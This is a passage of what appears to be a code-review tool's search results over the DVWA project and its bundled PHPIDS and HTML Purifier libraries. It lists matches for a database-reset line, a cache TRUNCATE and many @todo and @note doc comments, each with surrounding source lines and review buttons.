./dvwa/includes/DBMS/MySQL.php:15 (7/7) OK | Dubious | Bad | Hide
12-}
13-
14-// Create database
15:$drop_db = "DROP DATABASE IF EXISTS dvwa;";
16-if( !@mysql_query ( $drop_db ) ) {
17-	dvwaMessagePush( "Could not drop existing database<br />SQL: ".mysql_error() );
18-	dvwaPageReload();

TRUNCATE (1) Top | Hide

./external/phpids/0.6/lib/IDS/Caching/Database.php:248 (1/1) OK | Dubious | Bad | Hide
246-        
247-        try {
248:            $handle->query('TRUNCATE ' . 
249-                $this->config['table'].'');
250-            $statement = $handle->prepare('
251-                INSERT INTO `' .

@todo (33) Top | Hide

./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Filter/ExtractStyleBlocks.php:38 (1/33) OK | Dubious | Bad | Hide
36-    /**
37-     * Removes inline <style> tags from HTML, saves them for later use
38:     * @todo Extend to indicate non-text/css style blocks
39-     */
40-    public function preFilter($html, $config, $context) {
41-        $tidy = $config->get('FilterParam', 'ExtractStyleBlocksTidyImpl');
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Composite.php:17 (2/33) OK | Dubious | Bad | Hide
14-    
15-    /**
16-     * List of HTMLPurifier_AttrDef objects that may process strings
17:     * @todo Make protected
18-     */
19-    public $defs;
20-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Multiple.php:19 (3/33) OK | Dubious | Bad | Hide
16-    
17-    /**
18-     * Instance of component definition to defer validation to.
19:     * @todo Make protected
20-     */
21-    public $single;
22-    
23-    /**
24-     * Max number of values allowed.
25:     * @todo Make protected
26-     */
27-    public $max;
28-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/FontFamily.php:5 (4/33) OK | Dubious | Bad | Hide
2-
3-/**
4- * Validates a font family list according to CSS spec
5: * @todo whitelisting allowed fonts would be nice
6- */
7-class HTMLPurifier_AttrDef_CSS_FontFamily extends HTMLPurifier_AttrDef
8-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/Enum.php:15 (5/33) OK | Dubious | Bad | Hide
12-    
13-    /**
14-     * Lookup table of valid values.
15:     * @todo Make protected
16-     */
17-    public $valid_values   = array();
18-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/TokenFactory.php:12 (6/33) OK | Dubious | Bad | Hide
9- *       Other then that, there's not much point as we don't
10- *       maintain parallel HTMLPurifier_Token hierarchies (the main reason why
11- *       you'd want to use an abstract factory).
12: * @todo Port DirectLex to use this
13- */
14-class HTMLPurifier_TokenFactory
15-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Strategy/FixNesting.php:28 (7/33) OK | Dubious | Bad | Hide
25- * @note Whether or not unrecognized children are silently dropped or
26- *       translated into text depends on the child definitions.
27- * 
28: * @todo Enable nodes to be bubbled out of the structure.
29- */
30-
31-class HTMLPurifier_Strategy_FixNesting extends HTMLPurifier_Strategy
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:68 (8/33) OK | Dubious | Bad | Hide
65-    /**
66-     * Generates the file path to the serial file corresponding to
67-     * the configuration and definition name
68:     * @todo Make protected
69-     */
70-    public function generateFilePath($config) {
71-        $key = $this->generateKey($config);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:78 (9/33) OK | Dubious | Bad | Hide
75-    /**
76-     * Generates the path to the directory contain this cache's serial files
77-     * @note No trailing slash
78:     * @todo Make protected
79-     */
80-    public function generateDirectoryPath($config) {
81-        $base = $this->generateBaseDirectoryPath($config);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:88 (10/33) OK | Dubious | Bad | Hide
85-    /**
86-     * Generates path to base directory that contains all definition type
87-     * serials
88:     * @todo Make protected
89-     */
90-    public function generateBaseDirectoryPath($config) {
91-        $base = $config->get('Cache', 'SerializerPath');
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:385 (11/33) OK | Dubious | Bad | Hide
382-     *      it is different, and you'll probably have to modify your lists
383-     * @param $list String list to parse
384-     * @param array($allowed_elements, $allowed_attributes)
385:     * @todo Give this its own class, probably static interface
386-     */
387-    public function parseTinyMCEAllowedList($list) {
388-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache.php:6 (12/33) OK | Dubious | Bad | Hide
3-/**
4- * Abstract class representing Definition cache managers that implements
5- * useful common methods and is a factory.
6: * @todo Create a separate maintenance file advanced users can use to
7- *       cache their custom HTMLDefinition, which can be loaded
8- *       via a configuration directive
9: * @todo Implement memcached
10- */
11-abstract class HTMLPurifier_DefinitionCache
12-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/DirectLex.php:11 (13/33) OK | Dubious | Bad | Hide
8- * it can be four times faster than HTMLPurifier_Lexer_PEARSax3, although it
9- * pales in comparison to HTMLPurifier_Lexer_DOMLex.
10- * 
11: * @todo Reread XML spec and document differences.
12- */
13-class HTMLPurifier_Lexer_DirectLex extends HTMLPurifier_Lexer
14-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PEARSax3.php:17 (14/33) OK | Dubious | Bad | Hide
14- * don't use it. The unit tests do perform the tests on the SAX parser too, but
15- * whatever it does for poorly formed HTML is up to it.
16- * 
17: * @todo Generalize so that XML_HTMLSax is also supported.
18- * 
19- * @warning Entity-resolution inside attributes is broken.
20- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Injector/AutoParagraph.php:6 (15/33) OK | Dubious | Bad | Hide
3-/**
4- * Injector that auto paragraphs text in the root node based on
5- * double-spacing.
6: * @todo Ensure all states are unit tested, including variations as well.
7: * @todo Make a graph of the flow control for this Injector.
8- */
9-class HTMLPurifier_Injector_AutoParagraph extends HTMLPurifier_Injector
10-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:250 (16/33) OK | Dubious | Bad | Hide
247-    /**
248-     * Takes a piece of HTML and normalizes it by converting entities, fixing
249-     * encoding, extracting bits, and other good stuff.
250:     * @todo Consider making protected
251-     */
252-    public function normalize($html, $config, $context) {
253-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:284 (17/33) OK | Dubious | Bad | Hide
281-    
282-    /**
283-     * Takes a string of HTML (fragment or document) and returns the content
284:     * @todo Consider making protected
285-     */
286-    public function extractBody($html) {
287-        $matches = array();
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ContentSets.php:4 (18/33) OK | Dubious | Bad | Hide
1-<?php
2-
3-/**
4: * @todo Unit test
5- */
6-class HTMLPurifier_ContentSets
7-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Tidy.php:6 (19/33) OK | Dubious | Bad | Hide
3-/**
4- * Abstract class for a set of proprietary modules that clean up (tidy)
5- * poorly written HTML.
6: * @todo Figure out how to protect some of these methods/properties
7- */
8-class HTMLPurifier_HTMLModule_Tidy extends HTMLPurifier_HTMLModule
9-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Tidy.php:35 (20/33) OK | Dubious | Bad | Hide
32-    /**
33-     * Lazy load constructs the module by determining the necessary
34-     * fixes to create and then delegating to the populate() function.
35:     * @todo Wildcard matching and error reporting when an added or
36-     *       subtracted fix has no effect.
37-     */
38-    public function setup($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/CSSDefinition.php:266 (21/33) OK | Dubious | Bad | Hide
263-    /**
264-     * Performs extra config-based processing. Based off of
265-     * HTMLPurifier_HTMLDefinition.
266:     * @todo Refactor duplicate elements into common class (probably using
267-     *       composition, not inheritance).
268-     */
269-    protected function setupConfigStuff($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIScheme/mailto.php:8 (22/33) OK | Dubious | Bad | Hide
5-
6-/**
7- * Validates mailto (for E-mail) according to RFC 2368
8: * @todo Validate the email address
9: * @todo Filter allowed query parameters
10- */
11-
12-class HTMLPurifier_URIScheme_mailto extends HTMLPurifier_URIScheme {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php:15 (23/33) OK | Dubious | Bad | Hide
12- *       otherwise, you run the risk of missing a parameter and then
13- *       being stumped when a configuration directive doesn't work.
14- * 
15: * @todo Reconsider some of the public member variables
16- */
17-class HTMLPurifier_Config
18-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/LanguageFactory.php:8 (24/33) OK | Dubious | Bad | Hide
5- * caching and fallbacks.
6- * @note Thanks to MediaWiki for the general logic, although this version
7- *       has been entirely rewritten
8: * @todo Serialized cache for languages
9- */
10-class HTMLPurifier_LanguageFactory
11-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule.php:15 (25/33) OK | Dubious | Bad | Hide
12- *       correspond to the variables in HTMLPurifier_HTMLDefinition.
13- *       However, the prefix info carries no special meaning in these
14- *       objects (include it anyway if that's the correspondence though).
15: * @todo Consider making some member functions protected
16- */
17-
18-class HTMLPurifier_HTMLModule
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Generator.php:5 (26/33) OK | Dubious | Bad | Hide
2-
3-/**
4- * Generates HTML from tokens.
5: * @todo Refactor interface so that configuration/context is determined
6- *       upon instantiation, no need for messy generateFromTokens() calls
7: * @todo Make some of the more internal functions protected, and have
8- *       unit tests work around that
9- */
10-class HTMLPurifier_Generator
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Generator.php:169 (27/33) OK | Dubious | Bad | Hide
166-    
167-    /**
168-     * Escapes raw text data.
169:     * @todo This really ought to be protected, but until we have a facility
170-     *       for properly generating HTML here w/o using tokens, it stays
171-     *       public.
172-     * @param $string String data to escape for HTML.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Injector.php:13 (28/33) OK | Dubious | Bad | Hide
10- * are best described HTMLPurifier_Strategy_MakeWellFormed->processToken()
11- * documentation.
12- * 
13: * @todo Allow injectors to request a re-run on their output. This 
14- *       would help if an operation is recursive.
15- */
16-abstract class HTMLPurifier_Injector
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Language.php:39 (29/33) OK | Dubious | Bad | Hide
36-    
37-    /**
38-     * Has the language object been loaded yet?
39:     * @todo Make it private, fix usage in HTMLPurifier_LanguageTest
40-     */
41-    public $_loaded = false;
42-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Language.php:114 (30/33) OK | Dubious | Bad | Hide
111-     * @param $key string identifier of message
112-     * @param $args Parameters to substitute in
113-     * @return string localised message
114:     * @todo Implement conditionals? Right now, some messages make
115-     *     reference to line numbers, but those aren't always available
116-     */
117-    public function formatMessage($key, $args = array()) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Printer/HTMLDefinition.php:234 (31/33) OK | Dubious | Bad | Hide
231-    /**
232-     * Listifies a list of objects by retrieving class names and internal state
233-     * @param $array List of objects
234:     * @todo Also add information about internal state
235-     */
236-    protected function listifyObjectList($array) {
237-        ksort($array);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Printer/ConfigForm.php:4 (32/33) OK | Dubious | Bad | Hide
1-<?php
2-
3-/**
4: * @todo Rewrite to use Interchange objects
5- */
6-class HTMLPurifier_Printer_ConfigForm extends HTMLPurifier_Printer
7-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.php:51 (33/33) OK | Dubious | Bad | Hide
48- *       These configurations are entirely independent of each other and
49- *       are *not* merged (this behavior may change in the future).
50- * 
51: * @todo We need an easier way to inject strategies using the configuration
52- *       object.
53- */
54-class HTMLPurifier

@note (95) Top | Hide

./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigDef/Directive.php:5 (1/95) OK | Dubious | Bad | Hide
3-/**
4- * Structure object containing definition of a directive.
5: * @note This structure does not contain default values
6- */
7-class HTMLPurifier_ConfigDef_Directive extends HTMLPurifier_ConfigDef
8-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Filter/ExtractStyleBlocks.php:8 (2/95) OK | Dubious | Bad | Hide
5- * using CSSTidy, and then places them in $purifier->context->get('StyleBlocks')
6- * so they can be used elsewhere in the document.
7- * 
8: * @note
9- *      See tests/HTMLPurifier/Filter/ExtractStyleBlocksTest.php for
10- *      sample usage.
11- * 
12: * @note
13- *      This filter can also be used on stylesheets not included in the
14- *      document--something purists would probably prefer. Just directly
15- *      call HTMLPurifier_Filter_ExtractStyleBlocks->cleanCSS()
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema/Validator.php:6 (3/95) OK | Dubious | Bad | Hide
3-/**
4- * Performs validations on HTMLPurifier_ConfigSchema_Interchange
5- *
6: * @note If you see '// handled by InterchangeBuilder', that means a
7- *       design decision in that class would prevent this validation from
8- *       ever being necessary. We have them anyway, however, for
9- *       redundancy.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrTransform/SafeParam.php:8 (4/95) OK | Dubious | Bad | Hide
5- * will only allow name values it recognizes, and pre-fill certain attributes
6- * with required values.
7- * 
8: * @note
9- *      This class only supports Flash. In the future, Quicktime support
10- *      may be added.
11- *
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrTransform/Lang.php:5 (5/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Post-transform that copies lang's value to xml:lang (and vice-versa)
5: * @note Theoretically speaking, this could be a pre-transform, but putting
6- *       post is more efficient.
7- */
8-class HTMLPurifier_AttrTransform_Lang extends HTMLPurifier_AttrTransform
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Filter.php:18 (6/95) OK | Dubious | Bad | Hide
15- * 2->preFilter, 3->preFilter, purify, 3->postFilter, 2->postFilter,
16- * 1->postFilter.
17- * 
18: * @note Methods are not declared abstract as it is perfectly legitimate
19- *       for an implementation not to want anything to happen on a step
20- */
21-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Token/Tag.php:19 (7/95) OK | Dubious | Bad | Hide
16-    /**
17-     * The lower-case name of the tag, like 'a', 'b' or 'blockquote'.
18-     * 
19:     * @note Strictly speaking, XML tags are case sensitive, so we shouldn't
20-     * be lower-casing them, but these tokens cater to HTML tags, which are
21-     * insensitive.
22-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Filter.php:5 (8/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Microsoft's proprietary filter: CSS property
5: * @note Currently supports the alpha filter. In the future, this will
6- *       probably need an extensible framework
7- */
8-class HTMLPurifier_AttrDef_CSS_Filter extends HTMLPurifier_AttrDef
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Multiple.php:10 (9/95) OK | Dubious | Bad | Hide
7- * lengths to be specified.  This class can take a vanilla border-width
8- * definition and multiply it, usually into a max of four.
9- * 
10: * @note Even though the CSS specification isn't clear about it, inherit
11- *       can only be used alone: it will never manifest as part of a multi
12- *       shorthand declaration.  Thus, this class does not allow inherit.
13- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Font.php:12 (10/95) OK | Dubious | Bad | Hide
9-    /**
10-     * Local copy of component validators.
11-     * 
12:     * @note If we moved specific CSS property definitions to their own
13-     *       classes instead of having them be assembled at run time by
14-     *       CSSDefinition, this wouldn't be necessary.  We'd instantiate
15-     *       our own copies.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/TextDecoration.php:5 (11/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Validates the value for the CSS property text-decoration
5: * @note This class could be generalized into a version that acts sort of
6- *       like Enum except you can compound the allowed values.
7- */
8-class HTMLPurifier_AttrDef_CSS_TextDecoration extends HTMLPurifier_AttrDef
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/URI.php:5 (12/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Validates a URI in CSS syntax, which uses url('http://example.com')
5: * @note While theoretically speaking a URI in a CSS document could
6- *       be non-embedded, as of CSS2 there is no such usage so we're
7- *       generalizing it. This may need to be changed in the future.
8- * @warning Since HTMLPurifier_AttrDef_CSS blindly uses semicolons as
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/Background.php:12 (13/95) OK | Dubious | Bad | Hide
9-    
10-    /**
11-     * Local copy of component validators.
12:     * @note See HTMLPurifier_AttrDef_Font::$info for a similar impl.
13-     */
14-    protected $info;
15-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/ListStyle.php:12 (14/95) OK | Dubious | Bad | Hide
9-    
10-    /**
11-     * Local copy of component validators.
12:     * @note See HTMLPurifier_AttrDef_CSS_Font::$info for a similar impl.
13-     */
14-    protected $info;
15-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/URI.php:5 (15/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Validates a URI as defined by RFC 3986.
5: * @note Scheme-specific mechanics deferred to HTMLPurifier_URIScheme
6- */
7-class HTMLPurifier_AttrDef_URI extends HTMLPurifier_AttrDef
8-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS.php:5 (16/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Validates the HTML attribute style, otherwise known as CSS.
5: * @note We don't implement the whole CSS specification, so it might be
6- *       difficult to reuse this component in the context of validating
7- *       actual stylesheet declarations.
8: * @note If we were really serious about validating the CSS, we would
9- *       tokenize the styles and then parse the tokens. Obviously, we
10- *       are not doing that. Doing that could seriously harm performance,
11- *       but would make these components a lot more viable for a CSS
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/Enum.php:21 (17/95) OK | Dubious | Bad | Hide
18-    
19-    /**
20-     * Bool indicating whether or not enumeration is case sensitive.
21:     * @note In general this is always case insensitive.
22-     */
23-    protected $case_sensitive = false; // values according to W3C spec
24-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/HTML/Nmtokens.php:5 (18/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Validates contents based on NMTOKENS attribute type.
5: * @note The only current use for this is the class attribute in HTML
6: * @note Could have some functionality factored out into Nmtoken class
7- * @warning We cannot assume this class will be used only for 'class'
8- *          attributes. Not sure how to hook in magic behavior, then.
9- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/HTML/LinkTypes.php:5 (19/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Validates a rel/rev link attribute against a directive of allowed values
5: * @note We cannot use Enum because link types allow multiple
6- *       values.
7: * @note Assumes link types are ASCII text
8- */
9-class HTMLPurifier_AttrDef_HTML_LinkTypes extends HTMLPurifier_AttrDef
10-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/Lang.php:5 (20/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Validates the HTML attribute lang, effectively a language code.
5: * @note Built according to RFC 3066, which obsoleted RFC 1766
6- */
7-class HTMLPurifier_AttrDef_Lang extends HTMLPurifier_AttrDef
8-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/Integer.php:5 (21/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * Validates an integer.
5: * @note While this class was modeled off the CSS definition, no currently
6- *       allowed CSS uses this type.  The properties that do are: widows,
7- *       orphans, z-index, counter-increment, counter-reset.  Some of the
8- *       HTML attributes, however, find use for a non-negative version of this.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/URI/IPv6.php:6 (22/95) OK | Dubious | Bad | Hide
3-/**
4- * Validates an IPv6 address.
5- * @author Feyd @ forums.devnetwork.net (public domain)
6: * @note This function requires brackets to have been removed from address
7- *       in URI.
8- */
9-class HTMLPurifier_AttrDef_URI_IPv6 extends HTMLPurifier_AttrDef_URI_IPv4
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/TokenFactory.php:6 (23/95) OK | Dubious | Bad | Hide
3-/**
4- * Factory for token generation.
5- * 
6: * @note Doing some benchmarking indicates that the new operator is much
7- *       slower than the clone operator (even discounting the cost of the
8- *       constructor).  This class is for that optimization.
9- *       Other then that, there's not much point as we don't
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:5 (24/95) OK | Dubious | Bad | Hide
2-
3-/**
4- * HTML Purifier's internal representation of a URI.
5: * @note
6- *      Internal data-structures are completely escaped. If the data needs
7- *      to be used in a non-URI context (which is very unlikely), be sure
8- *      to decode it first. The URI may not necessarily be well-formed until
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URI.php:17 (25/95) OK | Dubious | Bad | Hide
14-    public $scheme, $userinfo, $host, $port, $path, $query, $fragment;
15-    
16-    /**
17:     * @note Automatically normalizes scheme and port
18-     */
19-    public function __construct($scheme, $userinfo, $host, $port, $path, $query, $fragment) {
20-        $this->scheme = is_null($scheme) || ctype_lower($scheme) ? $scheme : strtolower($scheme);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Strategy/FixNesting.php:25 (26/95) OK | Dubious | Bad | Hide
22- * task is pervasive through the strategy, though the two are distinct tasks
23- * and could, theoretically, be seperated (although it's not recommended).
24- * 
25: * @note Whether or not unrecognized children are silently dropped or
26- *       translated into text depends on the child definitions.
27- * 
28- * @todo Enable nodes to be bubbled out of the structure.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Context.php:7 (27/95) OK | Dubious | Bad | Hide
4- * Registry object that contains information about the current context.
5- * @warning Is a bit buggy when variables are set to null: it thinks
6- *          they don't exist! So use false instead, please.
7: * @note Since the variables Context deals with may not be objects,
8- *       references are very important here! Do not remove!
9- */
10-class HTMLPurifier_Context
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/UnitConverter.php:66 (28/95) OK | Dubious | Bad | Hide
63-     *      it before passing it here!
64-     * @param string $to_unit
65-     *      Unit to convert to.
66:     * @note
67-     *      About precision: This conversion function pays very special
68-     *      attention to the incoming precision of values and attempts
69-     *      to maintain a number of significant figure. Results are
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DoctypeRegistry.php:18 (29/95) OK | Dubious | Bad | Hide
15-    
16-    /**
17-     * Registers a doctype to the registry
18:     * @note Accepts a fully-formed doctype object, or the
19-     *       parameters for constructing a doctype object
20-     * @param $doctype Name of doctype or literal doctype object
21-     * @param $modules Modules doctype will load
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DoctypeRegistry.php:51 (30/95) OK | Dubious | Bad | Hide
48-    
49-    /**
50-     * Retrieves reference to a doctype of a certain name
51:     * @note This function resolves aliases
52:     * @note When possible, use the more fully-featured make()
53-     * @param $doctype Name of doctype
54-     * @return Editable doctype object
55-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DoctypeRegistry.php:69 (31/95) OK | Dubious | Bad | Hide
66-    /**
67-     * Creates a doctype based on a configuration object,
68-     * will perform initialization on the doctype
69:     * @note Use this function to get a copy of doctype that config
70-     *       can hold on to (this is necessary in order to tell
71-     *       Generator whether or not the current document is XML
72-     *       based or not).
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php:77 (32/95) OK | Dubious | Bad | Hide
74-    
75-    /**
76-     * Generates the path to the directory contain this cache's serial files
77:     * @note No trailing slash
78-     * @todo Make protected
79-     */
80-    public function generateDirectoryPath($config) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:20 (33/95) OK | Dubious | Bad | Hide
17- * Purifier internals. Many of them, however, are public, and may be
18- * edited by userspace code to tweak the behavior of HTMLDefinition.
19- * 
20: * @note This class is inspected by Printer_HTMLDefinition; please
21- *       update that class if things here change.
22- *
23- * @warning Directives that change this object's structure must be in
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:54 (34/95) OK | Dubious | Bad | Hide
51-    
52-    /**
53-     * String name of element used to wrap inline elements in block context
54:     * @note This is rarely used except for BLOCKQUOTEs in strict mode
55-     */
56-    public $info_block_wrapper = 'p';
57-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:95 (35/95) OK | Dubious | Bad | Hide
92-    
93-    /**
94-     * Adds a custom attribute to a pre-existing element
95:     * @note This is strictly convenience, and does not have a corresponding
96-     *       method in HTMLPurifier_HTMLModule
97-     * @param $element_name String element name to add attribute to
98-     * @param $attr_name String name of attribute
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:114 (36/95) OK | Dubious | Bad | Hide
111-    
112-    /**
113-     * Adds a custom element to your HTML definition
114:     * @note See HTMLPurifier_HTMLModule::addElement for detailed 
115-     *       parameter and return value descriptions.
116-     */
117-    public function addElement($element_name, $type, $contents, $attr_collections, $attributes) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:128 (37/95) OK | Dubious | Bad | Hide
125-    /**
126-     * Adds a blank element to your HTML definition, for overriding
127-     * existing behavior
128:     * @note See HTMLPurifier_HTMLModule::addBlankElement for detailed
129-     *       parameter and return value descriptions.
130-     */
131-    public function addBlankElement($element_name) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Bootstrap.php:27 (38/95) OK | Dubious | Bad | Hide
24- * Bootstrap class that contains meta-functionality for HTML Purifier such as
25- * the autoload function.
26- *
27: * @note
28- *      This class may be used without any other files from HTML Purifier.
29- */
30-class HTMLPurifier_Bootstrap
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache.php:56 (39/95) OK | Dubious | Bad | Hide
53-    
54-    /**
55-     * Checks if a definition's type jives with the cache's type
56:     * @note Throws an error on failure
57-     * @param $def Definition object to check
58-     * @return Boolean true if good, false if not
59-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache.php:100 (40/95) OK | Dubious | Bad | Hide
97-    
98-    /**
99-     * Clears all expired (older version or revision) objects from cache
100:     * @note Be carefuly implementing this method as flush. Flush must
101-     *       not interfere with other Definition types, and cleanup()
102-     *       should not be repeatedly called by userland code.
103-     */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/DOMLex.php:12 (41/95) OK | Dubious | Bad | Hide
9- * documents, it performs twenty times faster than
10- * HTMLPurifier_Lexer_DirectLex,and is the default choice for PHP 5. 
11- * 
12: * @note Any empty elements will have empty tokens associated with them, even if
13- * this is prohibited by the spec. This is cannot be fixed until the spec
14- * comes into play.
15- * 
16: * @note PHP's DOM extension does not actually parse any entities, we use
17- *       our own function to do that.
18- * 
19- * @warning DOM tends to drop whitespace, which may wreak havoc on indenting.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:7 (42/95) OK | Dubious | Bad | Hide
4- * Experimental HTML5-based parser using Jeroen van der Meer's PH5P library.
5- * Occupies space in the HTML5 pseudo-namespace, which may cause conflicts.
6- * 
7: * @note
8- *    Recent changes to PHP's DOM extension have resulted in some fatal
9- *    error conditions with the original version of PH5P. Pending changes,
10- *    this lexer will punt to DirectLex if DOM throughs an exception.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Printer.php:36 (43/95) OK | Dubious | Bad | Hide
33-    
34-    /**
35-     * Main function that renders object or aspect of that object
36:     * @note Parameters vary depending on printer
37-     */
38-    // function render() {}
39-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ElementDef.php:6 (44/95) OK | Dubious | Bad | Hide
3-/**
4- * Structure that stores an HTML element definition. Used by
5- * HTMLPurifier_HTMLDefinition and HTMLPurifier_HTMLModule.
6: * @note This class is inspected by HTMLPurifier_Printer_HTMLDefinition.
7- *       Please update that class too.
8- */
9-class HTMLPurifier_ElementDef
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ElementDef.php:20 (45/95) OK | Dubious | Bad | Hide
17-    
18-    /**
19-     * Associative array of attribute name to HTMLPurifier_AttrDef
20:     * @note Before being processed by HTMLPurifier_AttrCollections
21-     *       when modules are finalized during
22-     *       HTMLPurifier_HTMLDefinition->setup(), this array may also
23-     *       contain an array at index 0 that indicates which attribute
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ElementDef.php:82 (46/95) OK | Dubious | Bad | Hide
79-    
80-    /**
81-     * Lookup table of tags excluded from all descendants of this tag.
82:     * @note SGML permits exclusions for all descendants, but this is
83-     *       not possible with DTDs or XML Schemas. W3C has elected to
84-     *       use complicated compositions of content_models to simulate
